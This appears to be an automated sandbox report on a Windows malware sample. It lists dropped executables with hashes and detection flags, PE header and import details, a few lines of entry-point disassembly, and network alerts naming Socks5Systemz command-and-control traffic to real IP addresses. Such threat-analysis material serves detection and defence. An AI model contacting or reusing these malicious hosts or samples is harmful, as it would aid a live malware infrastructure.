                                                                SSDEEP:12288:r/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyR8h1K8xyFW:bkqZ1G7DMvrP537dzHsA6hcHGbH3EahX
                                                                MD5:AE19918E9A2F183E6DC54F47D905A105
                                                                SHA1:4D0AA8F6F6A9DB774D5E48D80FF76796A5FBCACA
                                                                SHA-256:B916FA0E8B7332FAADCB5E756DD8183555627E57ABCF332A5978ECABD9FBDF03
                                                                SHA-512:D8B1C199FDBC86335437F6353FCA2809AF3B959AC225BFA41BA2C78EFF4C324B38FA7573C8A244DBE03B4434DCED730DA43167E0C1EAA6811D4190AAAE53BC24
                                                                Malicious:true
                                                                Process:C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):42
                                                                Entropy (8bit):4.0050635535766075
                                                                Encrypted:false
                                                                SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.990387966645919
                                                                Encrypted:false
                                                                SSDEEP:48:65uxic/UNMSAjItYiA254tdqlkCuFCpfbNtm:cc9jItYbaC+zNt
                                                                MD5:F328A95046E3A2514C36347EAEC911C0
                                                                SHA1:8EC9C18384CA1E08A397BF7B3D46B6D784669EF0
                                                                SHA-256:D55E86610DCAD29C3D2857D9DAE91AA51228B1FA001EA2D7BDA88B9A2B5570A9
                                                                SHA-512:2FC3621433C5DA3DCB5B9D9133CD9D63D8F53FD60C81DDAB8B83BAD60EFB98942FC38A63DFA98EDFC8358C8E4E345A7EC8FA3AA14C18D4337CDD90EA0AED4718
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):97296
                                                                Entropy (8bit):7.9982317718947025
                                                                Encrypted:true
                                                                SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4065622
                                                                Entropy (8bit):7.998333417378816
                                                                Encrypted:true
                                                                SSDEEP:98304:Nd7lj7PJtJzLJo+Pb+jA2qBsK6Vz6Vl1ggkCURIO+S1Hn3PEQeK8FuIQQj9dRJ:bl/tBZ+0jGK6R62hfd1Hnp4FuIvLRJ
                                                                MD5:98C5D582966DD7E46FF73E7D6D62B87D
                                                                SHA1:4F37D61ED6959E6991C8888504B396CAF195383F
                                                                SHA-256:E0683D5F72C585FD92753C2CE41152B71364B04299684697C9D0D5E22638CC32
                                                                SHA-512:119C362FA6B09CA0B2868E0FB6D9A679F06CB38A31FE9971F6ED1AABA139EC7535D842197FB5E4E995E988E754FF4544DF2FE13C5A8F9B08E5F2106EB96B9140
                                                                Malicious:true
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:V:V
                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                Malicious:false
                                                                Preview:0
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):21
                                                                Entropy (8bit):3.880179922675737
                                                                Encrypted:false
                                                                SSDEEP:3:gFsR0GOWW:gyRhI
                                                                MD5:408E94319D97609B8E768415873D5A14
                                                                SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                                SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                                SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                                Malicious:false
                                                                Preview:9tKiK3bsYm4fMuK47Pk3s
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2560
                                                                Entropy (8bit):2.8818118453929262
                                                                Encrypted:false
                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6144
                                                                Entropy (8bit):4.215994423157539
                                                                Encrypted:false
                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):23312
                                                                Entropy (8bit):4.596242908851566
                                                                Encrypted:false
                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Process:C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):704000
                                                                Entropy (8bit):6.506162621910228
                                                                Encrypted:false
                                                                SSDEEP:12288:D/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyR8h1K8xyF:jkqZ1G7DMvrP537dzHsA6hcHGbH3Eahs
                                                                MD5:62FDBBA6364B54BBE42B437284A2963C
                                                                SHA1:B581DFA1E0C38C692426A62B8B4770C5441C6337
                                                                SHA-256:07009EF71F1CEAA86F14A6ACC181336A3F1D18C3E19468E1F1F81335A8C75B43
                                                                SHA-512:F79FB771A83197DA6FDE21A49AA3B24A0E9F98691F24D6D19C021CC404E2767825C5C8D4C5E85F7DCB16773B1D19FED32CAF83D034B05C50190099C8F5925671
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4065622
                                                                Entropy (8bit):7.998333417378816
                                                                Encrypted:true
                                                                SSDEEP:98304:Nd7lj7PJtJzLJo+Pb+jA2qBsK6Vz6Vl1ggkCURIO+S1Hn3PEQeK8FuIQQj9dRJ:bl/tBZ+0jGK6R62hfd1Hnp4FuIvLRJ
                                                                MD5:98C5D582966DD7E46FF73E7D6D62B87D
                                                                SHA1:4F37D61ED6959E6991C8888504B396CAF195383F
                                                                SHA-256:E0683D5F72C585FD92753C2CE41152B71364B04299684697C9D0D5E22638CC32
                                                                SHA-512:119C362FA6B09CA0B2868E0FB6D9A679F06CB38A31FE9971F6ED1AABA139EC7535D842197FB5E4E995E988E754FF4544DF2FE13C5A8F9B08E5F2106EB96B9140
                                                                Malicious:true
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.990387966645919
                                                                Encrypted:false
                                                                SSDEEP:48:65uxic/UNMSAjItYiA254tdqlkCuFCpfbNtm:cc9jItYbaC+zNt
                                                                MD5:F328A95046E3A2514C36347EAEC911C0
                                                                SHA1:8EC9C18384CA1E08A397BF7B3D46B6D784669EF0
                                                                SHA-256:D55E86610DCAD29C3D2857D9DAE91AA51228B1FA001EA2D7BDA88B9A2B5570A9
                                                                SHA-512:2FC3621433C5DA3DCB5B9D9133CD9D63D8F53FD60C81DDAB8B83BAD60EFB98942FC38A63DFA98EDFC8358C8E4E345A7EC8FA3AA14C18D4337CDD90EA0AED4718
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):5.8706564154608785
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:file.exe
                                                                File size:438'784 bytes
                                                                MD5:5237853dbebaefb1dfa86130dd1d39fa
                                                                SHA1:c2a42211c8970e1f10cc13261d5e133739c196f4
                                                                SHA256:e185e43f039f7a97672db4a44597abd6d2bf49c08d7bc689318a098ec826bb00
                                                                SHA512:72fc21a0d325b88b4e99d66d05f77ac362aa03cdd41db053cfecd2fec148740bc5349fa45001650500f844ff76784bc12177543deb8d075c5c84e93420c15c7a
                                                                SSDEEP:6144:bIkLslp6440MCP5FQn40gxeppjMo7LR68z1T:bIkIlp6445M3Q40goppL7LRNh
                                                                TLSH:5A94C0139691BCA0E96647329D2EC6E4762EB9214E193F7B33786F2F14701B2D273319
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P....%..P....4..P...."..P.......P...P..'P....+..P....5..P....0..P..Rich.P..........................PE..L....{.d...
                                                                Icon Hash:0e4655313179b18f
                                                                Entrypoint:0x405583
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x649C7BEB [Wed Jun 28 18:28:59 2023 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:0
                                                                File Version Major:5
                                                                File Version Minor:0
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:0
                                                                Import Hash:db15b2e5808ca5f767d44b63a5e7dde0
                                                                Instruction
                                                                call 00007FE08D030713h
                                                                jmp 00007FE08D02CB6Eh
                                                                mov edi, edi
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 28h
                                                                xor eax, eax
                                                                push ebx
                                                                mov ebx, dword ptr [ebp+0Ch]
                                                                push esi
                                                                mov esi, dword ptr [ebp+10h]
                                                                push edi
                                                                mov edi, dword ptr [ebp+08h]
                                                                mov byte ptr [ebp-08h], al
                                                                mov byte ptr [ebp-07h], al
                                                                mov byte ptr [ebp-06h], al
                                                                mov byte ptr [ebp-05h], al
                                                                mov byte ptr [ebp-04h], al
                                                                mov byte ptr [ebp-03h], al
                                                                mov byte ptr [ebp-02h], al
                                                                mov byte ptr [ebp-01h], al
                                                                cmp dword ptr [0045D04Ch], eax
                                                                je 00007FE08D02CD00h
                                                                push dword ptr [00461CCCh]
                                                                call 00007FE08D03017Bh
                                                                pop ecx
                                                                jmp 00007FE08D02CCF7h
                                                                mov eax, 0040903Ch
                                                                mov ecx, dword ptr [ebp+14h]
                                                                mov edx, 000000A6h
                                                                cmp ecx, edx
                                                                jg 00007FE08D02CE6Ah
                                                                je 00007FE08D02CE51h
                                                                cmp ecx, 19h
                                                                jg 00007FE08D02CDEEh
                                                                je 00007FE08D02CDDFh
                                                                mov edx, ecx
                                                                push 00000002h
                                                                pop ecx
                                                                sub edx, ecx
                                                                je 00007FE08D02CDC3h
                                                                dec edx
                                                                je 00007FE08D02CDB3h
                                                                sub edx, 05h
                                                                je 00007FE08D02CD9Bh
                                                                dec edx
                                                                je 00007FE08D02CD7Ch
                                                                sub edx, 05h
                                                                je 00007FE08D02CD63h
                                                                dec edx
                                                                je 00007FE08D02CD37h
                                                                sub edx, 09h
                                                                jne 00007FE08D02CECAh
                                                                mov dword ptr [ebp-28h], 00000003h
                                                                mov dword ptr [ebp-24h], 00401320h
                                                                fld qword ptr [edi]
                                                                lea ecx, dword ptr [ebp-28h]
                                                                fstp qword ptr [ebp-20h]
                                                                push ecx
                                                                fld qword ptr [ebx]
                                                                fstp qword ptr [ebp+00h]
                                                                Programming Language:
                                                                • [C++] VS2008 build 21022
                                                                • [ASM] VS2008 build 21022
                                                                • [ C ] VS2008 build 21022
                                                                • [IMP] VS2005 build 50727
                                                                • [RES] VS2008 build 21022
                                                                • [LNK] VS2008 build 21022
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x562b4 | 0x28 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xe618 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4158 | 0x40 | .text |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1a4 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x55c42 | 0x55e00 | 0a68425b9b7033c7c7fe633cac15f850 | False | 0.6249516693959243 | data | 6.279211279997702 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x57000 | 0xacd4 | 0x6200 | d2ee99fd572fa8cfdd221e4a76b71e24 | False | 0.08577806122448979 | data | 1.0105107112719858 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .wujep | 0x62000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .jin | 0x63000 | 0xd6 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x64000 | 0xe618 | 0xe800 | 774582d7b37a96cf37d840e024294928 | False | 0.3540375808189655 | data | 4.336055078457096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_CURSOR | 0x6d8f0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4375 |
| RT_CURSOR | 0x6da20 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | | | 0.44886363636363635 |
| RT_CURSOR | 0x6daf8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.27238805970149255 |
| RT_CURSOR | 0x6e9a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.375 |
| RT_CURSOR | 0x6f248 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5057803468208093 |
| RT_CURSOR | 0x6f7e0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755 |
| RT_CURSOR | 0x70688 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018 |
| RT_CURSOR | 0x70f30 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751 |
| RT_ICON | 0x64630 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7194700460829493 |
| RT_ICON | 0x64630 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7194700460829493 |
| RT_ICON | 0x64cf8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.46690871369294606 |
| RT_ICON | 0x64cf8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.46690871369294606 |
| RT_ICON | 0x672a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.7615248226950354 |
| RT_ICON | 0x672a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.7615248226950354 |
| RT_ICON | 0x67738 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.4898720682302772 |
| RT_ICON | 0x67738 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.4898720682302772 |
| RT_ICON | 0x685e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.46796028880866425 |
| RT_ICON | 0x685e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.46796028880866425 |
| RT_ICON | 0x68e88 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.43641618497109824 |
| RT_ICON | 0x68e88 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.43641618497109824 |
| RT_ICON | 0x693f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.27977178423236515 |
| RT_ICON | 0x693f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.27977178423236515 |
| RT_ICON | 0x6b998 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.2910412757973734 |
| RT_ICON | 0x6b998 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.2910412757973734 |
| RT_ICON | 0x6ca40 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.30655737704918035 |
| RT_ICON | 0x6ca40 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.30655737704918035 |
| RT_ICON | 0x6d3c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3351063829787234 |
                                                                RT_ICON0x6d3c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3351063829787234
                                                                RT_STRING0x717180x252dataTamilIndia0.5084175084175084
                                                                RT_STRING0x717180x252dataTamilSri Lanka0.5084175084175084
                                                                RT_STRING0x719700x396dataTamilIndia0.4596949891067538
                                                                RT_STRING0x719700x396dataTamilSri Lanka0.4596949891067538
                                                                RT_STRING0x71d080x51edataTamilIndia0.4480916030534351
                                                                RT_STRING0x71d080x51edataTamilSri Lanka0.4480916030534351
                                                                RT_STRING0x722280x3eedataTamilIndia0.4542743538767396
                                                                RT_STRING0x722280x3eedataTamilSri Lanka0.4542743538767396
                                                                RT_ACCELERATOR0x6d8980x58dataTamilIndia0.7954545454545454
                                                                RT_ACCELERATOR0x6d8980x58dataTamilSri Lanka0.7954545454545454
                                                                RT_GROUP_CURSOR0x6dad00x22data1.0588235294117647
                                                                RT_GROUP_CURSOR0x6f7b00x30data0.9375
                                                                RT_GROUP_CURSOR0x714980x30data0.9375
                                                                RT_GROUP_ICON0x677080x30dataTamilIndia0.9375
                                                                RT_GROUP_ICON0x677080x30dataTamilSri Lanka0.9375
                                                                RT_GROUP_ICON0x6d8300x68dataTamilIndia0.7019230769230769
                                                                RT_GROUP_ICON0x6d8300x68dataTamilSri Lanka0.7019230769230769
                                                                RT_VERSION0x714c80x250data0.5422297297297297
DLL | Import
KERNEL32.dll | GetComputerNameA, GetTempFileNameW, WriteConsoleInputW, SetComputerNameExA, SetEndOfFile, InterlockedIncrement, EnumCalendarInfoW, OpenJobObjectA, GetCurrentProcess, GetSystemDefaultLCID, CallNamedPipeW, OutputDebugStringW, GetModuleHandleW, GetCommConfig, FindNextVolumeMountPointA, GetDllDirectoryW, GetConsoleAliasExesW, EnumTimeFormatsA, EnumTimeFormatsW, GetUserDefaultLangID, TlsSetValue, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, SetConsoleCP, GetFileAttributesA, GetTimeFormatW, GetModuleFileNameW, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, ChangeTimerQueueTimer, SetLastError, GetProcAddress, VirtualAlloc, SetComputerNameA, LoadLibraryA, InterlockedExchangeAdd, GlobalUnWire, FreeEnvironmentStringsW, GetCurrentDirectoryA, OpenEventW, GetShortPathNameW, GetVersionExA, GetDiskFreeSpaceExW, TlsFree, SetFileAttributesW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, HeapAlloc, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, HeapFree, CloseHandle, TerminateProcess, IsDebuggerPresent, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetFilePointer, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, CreateFileA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
Language of compilation system | Country where language is spoken
Tamil | India
Tamil | Sri Lanka
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                2024-11-20T05:04:15.203927+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450058185.208.158.20280TCP
                                                                2024-11-20T05:04:15.203927+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450058185.208.158.20280TCP
                                                                2024-11-20T05:04:16.029802+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450059185.208.158.20280TCP
                                                                2024-11-20T05:04:16.029802+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450059185.208.158.20280TCP
                                                                2024-11-20T05:04:16.852260+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450060185.208.158.20280TCP
                                                                2024-11-20T05:04:16.852260+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450060185.208.158.20280TCP
                                                                2024-11-20T05:04:17.704692+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450061185.208.158.20280TCP
                                                                2024-11-20T05:04:17.704692+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450061185.208.158.20280TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                Nov 20, 2024 05:02:18.981591940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.981612921 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.981632948 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.981663942 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.981663942 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.981704950 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.981720924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.981734991 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.981760979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.981760979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.981791973 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.981806993 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.981822014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.981837034 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:18.981854916 CET4973080192.168.2.4185.156.72.65
